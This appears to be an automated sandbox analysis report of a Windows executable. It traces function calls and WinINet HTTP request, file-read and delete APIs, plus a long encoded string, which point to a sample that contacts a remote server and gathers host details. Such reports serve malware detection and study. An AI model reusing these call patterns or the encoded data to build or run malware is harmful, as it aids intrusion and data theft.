SetLastError 17729->17842 17731 4088ac 17732 418640 4 API calls 17731->17732 17733 4088b4 17732->17733 17734 418640 4 API calls 17733->17734 17735 4088be 17734->17735 17843 4186a0 TlsGetValue 17735->17843 17737 4088c3 17844 40a212 TlsGetValue 17737->17844 17739 4088d0 HttpOpenRequestW 17740 40a230 3 API calls 17739->17740 17741 4088de 17740->17741 17742 40a048 4 API calls 17741->17742 17744 408901 17741->17744 17742->17744 17743 40893b 17745 408965 17743->17745 17865 418570 GetLastError TlsGetValue SetLastError 17743->17865 17744->17743 17746 40892d HttpAddRequestHeadersW 17744->17746 17749 4178a0 RtlAllocateHeap 17745->17749 17746->17743 17748 408948 17866 418570 GetLastError TlsGetValue SetLastError 17748->17866 17751 40897c 17749->17751 17845 417970 17751->17845 17752 408950 17867 40beea 17752->17867 17756 408997 17758 4089a0 HttpSendRequestW 17756->17758 17757 4185b0 3 API calls 17757->17745 17854 418570 GetLastError TlsGetValue SetLastError 17758->17854 17760 4089ca 17855 418570 GetLastError TlsGetValue SetLastError 17760->17855 17762 4089d2 17763 416980 3 API calls 17762->17763 17764 4089de 17763->17764 17765 4185b0 3 API calls 17764->17765 17766 4089e8 InternetReadFile 17765->17766 17856 418570 GetLastError TlsGetValue SetLastError 17766->17856 17768 418640 4 API calls 17774 408a0a 17768->17774 17769 418570 GetLastError TlsGetValue SetLastError 17769->17774 17770 417730 6 API calls 17770->17774 17772 416760 5 API calls 17772->17774 17773 416980 3 API calls 17773->17774 17774->17766 17774->17768 17774->17769 17774->17770 17774->17772 17774->17773 17775 4185b0 TlsGetValue RtlAllocateHeap HeapReAlloc 17774->17775 17776 408a93 InternetCloseHandle InternetCloseHandle InternetCloseHandle InternetCloseHandle 17774->17776 17857 40a212 TlsGetValue 17774->17857 17775->17774 17858 4178c0 HeapFree 17776->17858 17778 408ac0 17859 418570 GetLastError TlsGetValue SetLastError 17778->17859 17780 408ac6 17860 418570 GetLastError TlsGetValue SetLastError 17780->17860 17782 408ace 17861 417540 17782->17861 17786 408ae6 17787 4187a0 HeapFree 17786->17787 17788 408afd 17787->17788 17789 4187a0 HeapFree 17788->17789 17790 408b06 17789->17790 17791 4187a0 HeapFree 17790->17791 17792 408b0f 17791->17792 17793 4187a0 HeapFree 17792->17793 17794 408b18 17793->17794 17795 4187a0 HeapFree 17794->17795 17796 408b21 17795->17796 17797 4187a0 HeapFree 17796->17797 17798 408b2a 17797->17798 17799 4187a0 HeapFree 17798->17799 17800 408b33 17799->17800 17801 4187a0 HeapFree 17800->17801 17802 408b3c 17801->17802 17803 4187a0 HeapFree 17802->17803 17804 408b45 17803->17804 17805 4187a0 HeapFree 17804->17805 17806 408b4e 17805->17806 17806->17578 17807->17584 17808->17586 17920 416e50 17809->17920 17811 404d97 17812 40a200 TlsGetValue 17811->17812 17812->17590 17813->17590 17815 418831 wcslen 17814->17815 17816 41889d 17814->17816 17819 418866 HeapReAlloc 17815->17819 17820 418848 HeapAlloc 17815->17820 17817 418888 17816->17817 17818 4188a5 HeapFree 17816->17818 17817->17667 17818->17817 17819->17817 17820->17817 17821->17686 17822->17688 17823->17694 17824->17696 17825->17702 17826->17704 17827->17706 17828->17708 17829->17712 17831 4172dd 17830->17831 17832 418a10 TlsGetValue 17831->17832 17833 4172e5 17832->17833 17834 4188d0 3 API calls 17833->17834 17835 4172f1 17834->17835 17838 4172fd 17835->17838 17870 418a60 TlsGetValue 17835->17870 17837 41732d 17837->17714 17838->17837 17838->17838 17839 417320 CharLowerW 17838->17839 17839->17714 17840->17716 17841->17729 17842->17731 17843->17737 17844->17739 17846 417a7f 17845->17846 17847 417987 17845->17847 17846->17756 17848 4179f2 17847->17848 17849 4179ca WideCharToMultiByte 17847->17849 17851 4179f7 WideCharToMultiByte 17848->17851 17853 417a3a 17848->17853 17850 417a23 WideCharToMultiByte 17849->17850 17852 417a2f 17850->17852 17851->17850 17852->17756 17853->17756 17854->17760 17855->17762 17856->17774 17857->17774 17858->17778 17859->17780 17860->17782 17871 417340 17861->17871 17864 40a200 TlsGetValue 17864->17786 17865->17748 17866->17752 17897 40bd6f 17867->17897 17870->17838 17872 41734f 17871->17872 17872->17872 17873 418a10 TlsGetValue 17872->17873 17874 41736d 17873->17874 17875 418a10 TlsGetValue 17874->17875 17876 41737b 17875->17876 17877 4188d0 3 API calls 17876->17877 17878 417389 17877->17878 17879 417399 17878->17879 17895 418a60 TlsGetValue 17878->17895 17885 4173a9 17879->17885 17896 418a60 TlsGetValue 17879->17896 17882 4174f9 17894 4189b0 TlsGetValue 17882->17894 17884 408adf 17884->17864 17885->17882 17886 417434 17885->17886 17887 4173fa HeapAlloc 17885->17887 17889 41745c wcsncpy 17886->17889 17892 417479 17886->17892 17888 417420 17887->17888 17888->17886 17888->17888 17889->17892 17890 4174c5 17890->17882 17891 4174cc HeapFree 17890->17891 17891->17882 17892->17890 17893 4174aa wcsncpy 17892->17893 17893->17890 17894->17884 17895->17879 17896->17885 17898 40bd80 memset 17897->17898 17899 40be25 17897->17899 17898->17899 17901 40be38 17899->17901 17902 40be3f 17899->17902 17915 40bed1 17899->17915 17905 4206d0 4 API calls 17901->17905 17903 420630 4 API calls 17902->17903 17906 40be44 strlen HeapAlloc 17903->17906 17904 40895b 17904->17757 17907 40be3d 17905->17907 17908 40bec4 17906->17908 17911 40be69 17906->17911 17907->17906 17909 40bed3 17908->17909 17910 40becc 17908->17910 17918 420620 ??3@YAXPAX 17909->17918 17917 4206c0 ??3@YAXPAX 17910->17917 17912 4205b0 5 API calls 17911->17912 17916 40beb5 HeapFree 17912->17916 17915->17904 17919 4189e0 TlsGetValue 17915->17919 17916->17908 17917->17915 17918->17915 17919->17904 17921 416e61 17920->17921 17922 418a10 TlsGetValue 17921->17922 17923 416ed4 17922->17923 17924 4188d0 3 API calls 17923->17924 17925 416ee2 17924->17925 17927 416ef2 17925->17927 17928 418a60 TlsGetValue 17925->17928 17927->17811 17928->17927 17930 416aff 17929->17930 17931 416c18 17930->17931 17940 416b8e 17930->17940 17932 418a10 TlsGetValue 17931->17932 17933 416c22 17932->17933 17934 416c3a 17933->17934 17935 416c2a _wcsdup 17933->17935 17936 418a10 TlsGetValue 17934->17936 17935->17934 17937 416c40 17936->17937 17938 416c57 17937->17938 17939 416c48 _wcsdup 17937->17939 17941 418a10 TlsGetValue 17938->17941 17939->17938 17943 416bdc wcsncpy 17940->17943 17945 40542f 17940->17945 17942 416c60 17941->17942 17944 416c68 _wcsdup 17942->17944 17948 416c78 17942->17948 17943->17940 17944->17948 17945->17596 17946 4188d0 3 API calls 17947 416d00 17946->17947 17949 416d52 wcsncpy 17947->17949 17950 416d6d 17947->17950 17951 416d06 17947->17951 17948->17946 17949->17950 17950->17951 17957 416e05 wcsncpy 17950->17957 17952 416dc4 17951->17952 17953 416dbb ??3@YAXPAX 17951->17953 17954 416dd7 17952->17954 17955 416dcb ??3@YAXPAX 17952->17955 17953->17952 17954->17945 17956 416dde ??3@YAXPAX 17954->17956 17955->17954 17956->17945 17957->17950 17958->16705 17959->16707 17960->16709 17961->16713 17962->16720 17963->16731 17964->16735 17965->16741 17966->16765 17967->16767 17968->16773 17972 40c676 17969->17972 17970 418a10 TlsGetValue 17971 40c6eb 17970->17971 17973 4188d0 3 API calls 17971->17973 17972->17970 17974 40c6fb 17973->17974 17975 40c709 memmove 17974->17975 17978 418a60 TlsGetValue 17974->17978 17975->16784 17977 40c707 17977->17975 17978->17977 17979->16794 17980->16798 17981->16815 17983 418710 21 API calls 17982->17983 17984 407946 17983->17984 17985 40a230 3 API calls 17984->17985 17986 40794f SHGetSpecialFolderLocation 17985->17986 17987 40796b 17986->17987 18005 407a09 17986->18005 18061 418570 GetLastError TlsGetValue SetLastError 17987->18061 17990 407971 18062 418570 GetLastError TlsGetValue SetLastError 17990->18062 17991 407a1b 17993 418640 4 API calls 17991->17993 17995 407a23 17993->17995 17994 407979 17996 416980 3 API calls 17994->17996 18076 40a200 TlsGetValue 17995->18076 17999 407985 17996->17999 17998 407a2a 18002 4187a0 HeapFree 17998->18002 18000 4185b0 3 API calls 17999->18000 18001 40798f SHGetPathFromIDListW 18000->18001 18003 4079a8 18001->18003 18004 403e79 18002->18004 18003->18005 18063 418570 GetLastError TlsGetValue SetLastError 18003->18063 18004->16821 18075 418570 GetLastError TlsGetValue SetLastError 18005->18075 18007 4079b0 18064 418570 GetLastError TlsGetValue SetLastError 18007->18064 18009 4079b8 18065 416900 18009->18065 18011 4079c8 18073 4186a0 TlsGetValue 18011->18073 18013 4079cd 18014 40a240 TlsGetValue 18013->18014 18015 4079d9 18014->18015 18015->18005 18074 418570 GetLastError TlsGetValue SetLastError 18015->18074 18017 4079ec 18018 418640 4 API calls 18017->18018 18019 4079f4 18018->18019 18020 418640 4 API calls 18019->18020 18021 4079ff 18020->18021 18022 4185b0 3 API calls 18021->18022 18022->18005 18023->16814 18078 40c7fb 18024->18078 18027->16839 18028->16843 18029->16847 18031 40491b 18030->18031 18031->18031 18032 418710 21 API calls 18031->18032 18033 40492d 18032->18033 18034 40a040 2 API calls 18033->18034 18035 404939 18034->18035 18036 40a040 2 API calls 18035->18036 18037 404946 18036->18037 18038 40a040 2 API calls 18037->18038 18039 404953 18038->18039 18040 40a040 2 API calls 18039->18040 18041 404960 18040->18041 18042 40a040 2 API calls 18041->18042 18043 40496d 18042->18043 18044 40a040 2 API calls 18043->18044 18045 40497a CoInitialize 18044->18045 18046 4049a4 18045->18046 18047 4187a0 HeapFree 18046->18047 18048 404a8e 18047->18048 18049 4187a0 HeapFree 18048->18049 18050 404a97 18049->18050 18051 4187a0 HeapFree 18050->18051 18052 404aa0 18051->18052 18053 4187a0 HeapFree 18052->18053 18054 404aa9 18053->18054 18055 4187a0 HeapFree 18054->18055 18056 404ab2 18055->18056 18057 4187a0 HeapFree 18056->18057 18058 404abb 18057->18058 18059 4187a0 HeapFree 18058->18059 18060 403f3f 18059->18060 18060->16850 18061->17990 18062->17994 18063->18007 18064->18009 18066 41690e 18065->18066 18067 418a10 TlsGetValue 18066->18067 18068 41692c 18067->18068 18069 4188d0 3 API calls 18068->18069 18070 41693a 18069->18070 18072 41694a 18070->18072 18077 418a60 TlsGetValue 18070->18077 18072->18011 18073->18013 18074->18017 18075->17991 18076->17998 18077->18072 18079 40c802 DeleteFileW 18078->18079 18080 40c824 18078->18080 18079->18080 18080->16835 18083 418710 21 API calls 18082->18083 18084 408d38 18083->18084 18085 4117ff 4 API calls 18084->18085 18086 408d56 18085->18086 19432 418570 GetLastError TlsGetValue SetLastError 18086->19432 18088 408d5c 19433 418570 GetLastError TlsGetValue SetLastError 18088->19433 18090 408d64 19434 418570 GetLastError TlsGetValue SetLastError 18090->19434 18092 408d6c 19435 418570 GetLastError TlsGetValue SetLastError 18092->19435 18094 408d74 18095 416760 5 API calls 18094->18095 18096 408d86 18095->18096 19436 418570 GetLastError TlsGetValue SetLastError 18096->19436 18098 408d8c 19437 418570 GetLastError TlsGetValue SetLastError 18098->19437 18100 408d94 18101 416900 5 API calls 18100->18101 18102 408da6 18101->18102 19438 418570 GetLastError TlsGetValue SetLastError 18102->19438 18104 408dad 19439 418570 GetLastError TlsGetValue SetLastError 18104->19439 18106 408db5 18107 416400 6 API calls 18106->18107 18108 408dcc 18107->18108 19440 40a212 TlsGetValue 18108->19440 18110 408dd2 18111 4172d0 6 API calls 18110->18111 18112 408dda 18111->18112 18113 4185b0 3 API calls 18112->18113 18114 408de4 18113->18114 19441 418570 GetLastError TlsGetValue SetLastError 18114->19441 18116 408dea 18117 408bb3 40 API calls 18116->18117 18118 408df7 18117->18118 18119 418640 4 API calls 18118->18119 18120 408e02 18119->18120 18121 4185b0 3 API calls 18120->18121 18122 408e0e 18121->18122 19442 418570 GetLastError TlsGetValue SetLastError 18122->19442 18124 408e14 19443 407270 18124->19443 18127 4185b0 3 API calls 18128 408e27 18127->18128 19469 418570 GetLastError TlsGetValue SetLastError 18128->19469 18130 408e33 18131 418640 4 API calls 18130->18131 18132 408e3b 18131->18132 18133 4185b0 3 API calls 18132->18133 18134 408e48 18133->18134 19470 418570 GetLastError TlsGetValue SetLastError 18134->19470 18136 408e4e 19471 418570 GetLastError TlsGetValue SetLastError 18136->19471 18138 408e56 19472 40c5a6 18138->19472 18141 4185b0 3 API calls 18142 408e66 18141->18142 19480 418570 GetLastError TlsGetValue SetLastError 18142->19480 18144 408e6c 19481 408315 18144->19481 19432->18088 19433->18090 19434->18092 19435->18094 19436->18098 19437->18100 19438->18104 19439->18106 19440->18110 19441->18116 19442->18124 19444 418710 21 API calls 19443->19444 19445 407275 19444->19445 19446 40a230 3 API calls 19445->19446 19447 40727e PathFileExistsW 19446->19447 19448 40728d 19447->19448 19449 4072d2 19448->19449 19802 418570 GetLastError TlsGetValue SetLastError 19448->19802 19832 418570 GetLastError TlsGetValue SetLastError 19449->19832 19452 4072d8 19454 405681 86 API calls 19452->19454 19453 4072a0 19803 418570 GetLastError TlsGetValue SetLastError 19453->19803 19456 4072e5 19454->19456 19833 40a200 TlsGetValue 19456->19833 19457 4072a8 19804 407af2 19457->19804 19460 4072ec 19460->18127 19463 4072b9 19831 40a212 TlsGetValue 19463->19831 19465 4072c4 19466 409185 31 API calls 19465->19466 19467 4072cd 19466->19467 19468 40a230 3 API calls 19467->19468 19468->19449 19469->18130 19470->18136 19471->18138 19473 4188d0 3 API calls 19472->19473 19474 40c5b7 GetComputerNameW 19473->19474 19475 40c5d4 19474->19475 19476 40c5c9 19474->19476 19866 4189e0 TlsGetValue 19475->19866 19865 4189b0 TlsGetValue 19476->19865 19479 408e5d 19479->18141 19480->18144 19482 418710 21 API calls 19481->19482 19483 40831d 19482->19483 19484 40a230 3 API calls 19483->19484 19485 408326 19484->19485 19867 418570 GetLastError TlsGetValue SetLastError 19485->19867 19487 40832c 19868 403ca1 19487->19868 19802->19453 19803->19457 19805 418710 21 API calls 19804->19805 19806 407aff 19805->19806 19807 40a230 3 API calls 19806->19807 19808 407b08 19807->19808 19809 40a048 4 API calls 19808->19809 19823 407b15 19809->19823 19810 407c63 19855 418570 GetLastError TlsGetValue SetLastError 19810->19855 19812 40b720 9 API calls 19812->19823 19813 407c6d 19814 418640 4 API calls 19813->19814 19815 407c75 19814->19815 19856 40a200 TlsGetValue 19815->19856 19817 418640 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 19817->19823 19818 407c7c 19819 4187a0 HeapFree 19818->19819 19820 407c94 19819->19820 19821 4187a0 HeapFree 19820->19821 19822 4072b4 19821->19822 19830 4186a0 TlsGetValue 19822->19830 19823->19810 19823->19812 19823->19817 19825 418570 GetLastError TlsGetValue SetLastError 19823->19825 19826 4185b0 TlsGetValue RtlAllocateHeap HeapReAlloc 19823->19826 19827 416400 6 API calls 19823->19827 19834 4165d0 19823->19834 19844 40a212 TlsGetValue 19823->19844 19845 417260 19823->19845 19825->19823 19826->19823 19827->19823 19830->19463 19831->19465 19832->19452 19833->19460 19835 416600 19834->19835 19836 4165e8 19834->19836 19838 4188d0 3 API calls 19835->19838 19836->19835 19837 4165ef 19836->19837 19857 416650 19837->19857 19841 41660c 19838->19841 19862 4189b0 TlsGetValue 19841->19862 19843 41663c 19843->19823 19844->19823 19846 41726d 19845->19846 19847 418a10 TlsGetValue 19846->19847 19848 417275 19847->19848 19849 4188d0 3 API calls 19848->19849 19850 417281 19849->19850 19852 41728d 19850->19852 19864 418a60 TlsGetValue 19850->19864 19853 4172bd 19852->19853 19854 4172b0 CharUpperW 19852->19854 19853->19823 19854->19823 19855->19813 19856->19818 19858 4188d0 3 API calls 19857->19858 19861 416660 19858->19861 19860 4165f9 19860->19823 19861->19861 19863 4189b0 TlsGetValue 19861->19863 19862->19843 19863->19860 19864->19852 19865->19479 19866->19479 19867->19487 19869 418710 21 API calls 19868->19869 19870 403caf 19869->19870 19871 40a230 3 API calls 19870->19871 19872 403cb8 19871->19872 19873 40a040 2 API calls 19872->19873 19874 403cc4 19873->19874 19875 40a040 2 API calls 19874->19875 19876 403cd1 19875->19876 19877 40a040 2 API calls 19876->19877 19878 403cde 19877->19878 19879 403cf5 19878->19879 19880 403ce5 19878->19880 19882 40a048 4 API calls 19879->19882 19881 40a048 4 API calls 19880->19881 19883 403cf3 19881->19883 19882->19883 19938 418570 GetLastError TlsGetValue SetLastError 19883->19938 19885 403d09 19939 418570 GetLastError TlsGetValue SetLastError 19885->19939 19887 403d20 19888 418640 4 API calls 19887->19888 19889 403d28 19888->19889 19890 418640 4 API calls 19889->19890 19891 403d32 19890->19891 19892 418640 4 API calls 19891->19892 19893 403d3c 19892->19893 19894 418640 4 API calls 19893->19894 19895 403d47 19894->19895 19896 418640 4 API calls 19895->19896 19897 403d51 19896->19897 19898 418640 4 API calls 19897->19898 19899 403d5c 19898->19899 19940 4186a0 TlsGetValue 19899->19940 19901 403d61 19941 40a212 TlsGetValue 19901->19941 19903 403d6c 19904 40abf2 45 API calls 19903->19904 19905 403d75 19904->19905 19906 40a230 3 API calls 19905->19906 19907 403d7a 19906->19907 19908 40a048 4 API calls 19907->19908 19932 403d8c 19908->19932 19909 403dee 19960 418570 GetLastError TlsGetValue SetLastError 19909->19960 19914 403de5 19951 40b208 CloseHandle 19914->19951 19920 418570 GetLastError TlsGetValue SetLastError 19920->19932 19922 418640 4 API calls 19922->19932 19932->19909 19932->19914 19932->19920 19932->19922 19934 4185b0 3 API calls 19932->19934 19942 40b150 WaitForSingleObject 19932->19942 19946 40b197 PeekNamedPipe 19932->19946 19947 40b1d4 19932->19947 19934->19932 19938->19885 19939->19887 19940->19901 19941->19903 19943 40b167 19942->19943 19944 40b18a 19942->19944 19943->19944 19944->19932 19946->19932 19948 40b1e1 19947->19948 21833->17023 21834->17033 21835->17057 21836->17048 21838 417dd4 2 API calls 21837->21838 21839 40d25f 21838->21839 21840 40d273 21839->21840 21843 40d150 21839->21843 21840->17072 21842 40d270 21842->17072 21844 40d244 21843->21844 21845 40d164 21843->21845 21844->21842 21845->21844 21846 40d178 21845->21846 21847 40d1dd 21845->21847 21848 40d1b0 21846->21848 21849 40d188 21846->21849 21861 40d960 WideCharToMultiByte 21847->21861 21848->21848 21851 40d1bb WriteFile 21848->21851 21854 40d280 4 API calls 21849->21854 21851->21842 21852 40d1f7 21853 40d23b 21852->21853 21855 40d207 21852->21855 21856 40d218 WriteFile 21852->21856 21853->21842 21858 40d1aa 21854->21858 21859 40d280 4 API calls 21855->21859 21857 40d22c HeapFree 21856->21857 21857->21853 21858->21842 21860 40d212 21859->21860 21860->21857 21862 40d985 HeapAlloc 21861->21862 21863 40d9be 21861->21863 21864 40d9b9 21862->21864 21865 40d99c WideCharToMultiByte 21862->21865 21863->21852 21864->21852 21865->21864 21866->17098 21867->17099 21868->17108 21869->17110 21870->17112 21871->17116 21872->17118 21873->17126 21874->17128 21875->17130 21876 419120 malloc 21877 405626 21883 405523 21877->21883 21878 40563c 21908 418770 TlsGetValue 21878->21908 21880 4187a0 HeapFree 21881 40564e 21880->21881 21882 4187a0 HeapFree 21881->21882 21884 405657 21882->21884 21883->21878 21893 418570 GetLastError TlsGetValue SetLastError 21883->21893 21894 4167d0 9 API calls 21883->21894 21895 4185b0 TlsGetValue RtlAllocateHeap HeapReAlloc 21883->21895 21896 4055f6 21883->21896 21885 4187a0 HeapFree 21884->21885 21886 405660 21885->21886 21887 4187a0 HeapFree 21886->21887 21888 405669 21887->21888 21889 4187a0 HeapFree 21888->21889 21890 405672 21889->21890 21891 4187a0 HeapFree 21890->21891 21892 40567b 21891->21892 21893->21883 21894->21883 21895->21883 21905 418570 GetLastError TlsGetValue SetLastError 21896->21905 21898 4055fc 21906 418570 GetLastError TlsGetValue SetLastError 21898->21906 21900 405604 21901 4167d0 9 API calls 21900->21901 21902 40561a 21901->21902 21907 40a200 TlsGetValue 21902->21907 21904 405621 21904->21880 21905->21898 21906->21900 21907->21904 21908->21904 23105 406336 23106 418710 21 API calls 23105->23106 23117 40633b 23106->23117 23107 418640 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 23107->23117 23108 418570 GetLastError TlsGetValue SetLastError 23108->23117 23109 4039b7 43 API calls 23109->23117 23110 4169d0 WideCharToMultiByte WideCharToMultiByte RtlAllocateHeap 23110->23117 23111 4046e0 72 API calls 23111->23117 23112 40233d 62 API calls 23112->23117 23114 40a212 TlsGetValue 23114->23117 23115 408683 136 API calls 23115->23117 23116 40a230 GetLastError TlsGetValue SetLastError 23116->23117 23117->23107 23117->23108 23117->23109 23117->23110 23117->23111 23117->23112 23117->23114 23117->23115 23117->23116 23118 40c4f3 2 API calls 23117->23118 23119 4186a0 TlsGetValue 23117->23119 23118->23117 23119->23117 21909 401c3b 21956 40a980 EnterCriticalSection 21909->21956 21911 401c40 21928 40c4c3 21911->21928 21921 401c59 21947 417bf5 21921->21947 21925 401c68 21955 4176b0 HeapDestroy 21925->21955 21927 401c6d 21929 40c4d2 21928->21929 21930 40c4cc 21928->21930 21932 40c4e2 21929->21932 21933 40c4dc WSACleanup 21929->21933 21931 418370 2 API calls 21930->21931 21931->21929 21934 401c45 21932->21934 21935 40c4eb FreeLibrary 21932->21935 21933->21932 21936 40c7eb 21934->21936 21935->21934 21937 40c7f4 21936->21937 21938 401c4a 21936->21938 21939 418370 2 API calls 21937->21939 21940 40cad0 21938->21940 21939->21938 21941 418370 2 API calls 21940->21941 21942 401c4f 21941->21942 21943 411d34 21942->21943 21944 418370 2 API calls 21943->21944 21945 401c54 21944->21945 21946 412f20 FreeLibrary 21945->21946 21946->21921 21948 418370 2 API calls 21947->21948 21949 401c63 21948->21949 21950 417c3f 21949->21950 21951 417c4d 21950->21951 21952 417c4c 21950->21952 21953 417c62 21951->21953 21954 417c56 TlsFree 21951->21954 21952->21925 21953->21925 21954->21953 21955->21927 21957 40a996 21956->21957 21958 40a9b9 LeaveCriticalSection 21956->21958 21959 40a997 CloseHandle 21957->21959 21961 40a9b8 21957->21961 21958->21911 21960 4184ad HeapFree 21959->21960 21960->21957 21961->21958 22452 4050c5 22453 418710 21 API calls 22452->22453 22460 4050ca 22453->22460 22454 418570 GetLastError TlsGetValue SetLastError 22454->22460 22455 407646 170 API calls 22455->22460 22456 4059bb 34 API calls 22456->22460 22457 418640 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 22457->22460 22459 40a212 TlsGetValue 22459->22460 22460->22454 22460->22455 22460->22456 22460->22457 22460->22459 22461 408683 136 API calls 22460->22461 22462 402593 301 API calls 22460->22462 22463 40a230 3 API calls 22460->22463 22464 40463d 262 API calls 22460->22464 22465 40c4f3 2 API calls 22460->22465 22466 403e49 51 API calls 22460->22466 22467 4186a0 TlsGetValue 22460->22467 22461->22460 22462->22460 22463->22460 22464->22460 22465->22460 22466->22460 22467->22460 22569 4166f9 22570 416700 22569->22570 22570->22570 22573 4189b0 TlsGetValue 22570->22573 22572 416725 22573->22572

                                                        Executed Functions

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 577 408683-408684 578 408689-408694 577->578 578->578 579 408696-40878a call 418710 call 40a230 call 40a040 * 5 call 418570 * 2 call 40bbc2 call 4185b0 call 418570 * 2 call 40bbc2 call 4185b0 call 418570 * 4 call 40bbc2 call 40a212 call 4172d0 call 4186a0 call 40a240 call 40a250 578->579 630 408791-4087d1 InternetOpenW InternetSetOptionW 579->630 631 40878c 579->631 632 4087d3-4087e3 630->632 633 4087e5-4087ed 630->633 631->630 634 4087f5-408804 call 40a250 632->634 633->634 637 408806-408808 634->637 638 40880a 634->638 639 40880f-408811 637->639 638->639 640 408823-40882c call 40a048 639->640 641 408813-408821 call 40a048 639->641 645 408831-408840 call 40a250 640->645 641->645 648 408850-4088f1 InternetConnectW call 418570 * 2 call 418640 * 2 call 4186a0 call 40a212 HttpOpenRequestW call 40a230 call 40a250 645->648 649 408842-40884b call 40a048 645->649 667 408901-408910 call 40a250 648->667 668 4088f3-4088fc call 40a048 648->668 649->648 672 408912-408914 667->672 673 408916 667->673 668->667 674 40891b-40891d 672->674 673->674 675 40893b-408940 674->675 676 40891f-408936 call 416730 HttpAddRequestHeadersW 674->676 678 408942-408960 call 418570 * 2 call 40beea call 4185b0 675->678 679 408965-4089e3 call 416730 call 4178a0 call 417970 call 416730 HttpSendRequestW call 418570 * 2 call 416980 call 4185b0 675->679 676->675 678->679 703 4089e8-408a8d InternetReadFile call 418570 call 418640 call 418570 * 4 call 417730 call 40a212 call 416760 call 4185b0 call 418570 * 2 call 416980 call 4185b0 679->703 732 408a93-408b52 InternetCloseHandle * 4 call 4178c0 call 418570 * 2 call 417540 call 40a200 call 4187a0 * 10 703->732
                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000001,00430024,00430024,00000000), ref: 004087AB
                                                        • InternetSetOptionW.WININET(00000000,00000002,000003E8,00000004), ref: 004087C7
                                                        • InternetConnectW.WININET(00000000,00000000,00000000,00430024,00430024,00000003,00000000,00000000), ref: 00408877
                                                        • HttpOpenRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00430024,00430024,00000000), ref: 004088D4
                                                        • HttpAddRequestHeadersW.WININET(?,00000000,00000000,?), ref: 00408936
                                                          • Part of subcall function 004178A0: RtlAllocateHeap.NTDLL(00000008,?,00416A00,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004178B1
                                                          • Part of subcall function 00417970: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,-00000400,00408997,00000000,?,FFFFFFFF), ref: 004179DE
                                                          • Part of subcall function 00417970: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,-00000400,00408997,00000000,?,FFFFFFFF), ref: 00417A23
                                                        • HttpSendRequestW.WININET(00000000,00430024,00000000,00000000,00000000), ref: 004089BB
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                        • InternetReadFile.WININET(?,00000000,00000400,00000000), ref: 004089FB
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 0040A212: TlsGetValue.KERNEL32(00000000,0040111B,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000,0043383C,00000000,00000000,00000000,0000000C), ref: 0040A219
                                                          • Part of subcall function 004185B0: HeapReAlloc.KERNEL32(02A80000,00000000,?,?), ref: 0041860C
                                                        • InternetCloseHandle.WININET(00000000), ref: 00408A97
                                                        • InternetCloseHandle.WININET(00000000), ref: 00408AA0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00408AA9
                                                        • InternetCloseHandle.WININET(?), ref: 00408AB2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
